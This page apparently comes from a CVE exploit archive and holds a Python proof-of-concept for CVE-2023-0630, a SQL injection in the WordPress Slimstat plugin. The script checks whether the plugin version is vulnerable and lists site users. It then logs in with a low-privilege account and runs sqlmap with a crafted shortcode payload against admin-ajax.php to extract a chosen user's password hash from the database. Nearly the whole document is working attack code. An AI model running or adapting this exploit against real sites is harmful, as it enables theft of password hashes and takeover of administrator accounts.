4837 Total CVEs
26 Years
GitHub
Home / 2023 / CVE-2023-0630
README.md
Rendering markdown...
POC / cve-2023-0630.py PY
⬇ Raw GitHub ✕ Close 
import os
import click
import argparse
import requests
import subprocess
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()



def version_check(wordpress_url):
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}
    plugin_url = ""+wordpress_url+"/wp-content/plugins/wp-slimstat/readme.txt"
    response = requests.get(plugin_url, headers=headers,verify=False,timeout=30)
    if response.status_code == 200:
        content = response.text

        version_line = next((line for line in content.split('\n') if line.startswith('Stable tag:')), None)
        if version_line:
            version = version_line.split(':')[1].strip()
            if version >= '4.9.3.3':
                print("The plugin version is 4.9.3.3 or above.")
                exit()
            else:
                print("The plugin version is below 4.9.3.3.")
                return True
        else:
            print("Failed to find the version information in the readme.txt file.")
            exit()
    else:
        print("Plugin not installed")
        exit()

def fetch_usernames_rest_api(wordpress_url):
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299'}
    response = session.get(f"{wordpress_url}/wp-json/wp/v2/users", headers=headers,verify=False,timeout=30)
    if response.status_code == 200:
        users = response.json()
        return users
    else:
        print(f"Failed to fetch usernames using REST API. Error: {response.text}")
        return []

def select_user(users):
    click.echo("Select a user:")
    for user in users:
        click.echo(f"{user['id']}. {user['name']}")

    user_id = click.prompt("Enter the user ID", type=int)
    selected_user = next((user for user in users if user['id'] == user_id), None)
    if selected_user:
        return selected_user
    else:
        click.echo("Invalid user ID.")
        return None


def hack_em(user_id, username,password,wordpress_url,username_of_hash,cookies):
    cookie_args = "".join(["--cookie {}={} ".format(k, v) for k, v in cookies.items()])
    command = 'sqlmap -u "'+wordpress_url+'/wp-admin/admin-ajax.php"  --data="action=parse-media-shortcode&shortcode=%5bslimstat%20f%3d%22count%22%20w%3d%22author%22%5dWHERE%3a1*%5b%2fslimstat%5d" --level 5 --risk 3 --threads 4 --batch --dbms=mysql --sql-query="SELECT user_pass FROM wp_users WHERE ID = '+str(user_id)+';" {}'.format(cookie_args)
    try:
        process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)
    
        for line in iter(process.stdout.readline, ''):
            print(line.strip())

        process.communicate()  # Wait for the command to complete
    
        if process.returncode != 0:
            print(f"Command execution failed with error code {process.returncode}.")
    except subprocess.CalledProcessError as e:
        print(f"Command execution failed with error code {e.returncode}.")
        print(e.output)


def sendem(user_id,username,password,wordpress_url,username_of_hash):
    # Set up the session
    session = requests.Session()
    user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

    # Define the login URL and credentials
    login_url = wordpress_url + '/wp-login.php'

    # Send a GET request to retrieve the login page and obtain necessary cookies
    response = session.get(login_url, headers={"User-Agent": user_agent})

    # Extract the required cookies from the response headers
    cookies = response.cookies

    # Prepare the login data
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': wordpress_url + '/wp-admin/',
        'testcookie': '1'
    }

    # Send a POST request to log in
    login_response = session.post(login_url, data=login_data, cookies=cookies, headers={"User-Agent": user_agent})
    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
       hack_em(user_id, username,password,wordpress_url,username_of_hash,session.cookies)
        

      

    


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-w", "--url", required=True, help="URL of the WordPress site")
    parser.add_argument("-u", "--username", required=True, help="Username of your wordpress user")
    parser.add_argument("-p", "--password", required=True, help="Password of your wordpress password")
    args = parser.parse_args()
    wordpress_url = args.url
    version_check(wordpress_url)
    username = args.username
    password = args.password
    users = fetch_usernames_rest_api(wordpress_url)
    if users:
        selected_user = select_user(users)
        if selected_user:
            user_id = selected_user['id']
            username_of_hash = selected_user['name']
            sendem(user_id, username,password,wordpress_url,username_of_hash)